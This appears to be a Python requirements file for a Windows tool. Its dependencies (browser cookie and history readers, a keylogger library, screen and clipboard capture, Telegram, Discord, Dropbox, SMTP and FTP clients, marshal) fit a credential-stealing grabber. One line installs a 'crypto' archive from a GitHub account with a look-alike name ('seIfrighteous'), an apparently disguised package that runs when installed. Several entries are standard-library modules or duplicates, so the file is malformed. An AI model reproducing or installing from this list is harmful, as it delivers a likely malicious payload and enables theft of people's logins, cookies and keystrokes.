requests
Pillow
pyperclip
pywin32
pycryptodome
websocket-client
windows
psutil
https://github.com/seIfrighteous/x/releases/download/selfrighteous/crypto-2.7.1.tar.gz
pyautogui
pynput
browser_cookie3
requests
psutil
pyperclip
Pillow
discord.py
telethon
winreg
subprocess
smtplib
ftplib
ctypes
getpass
pycryptodome
browser_history
cloudscraper
dropbox
marshal

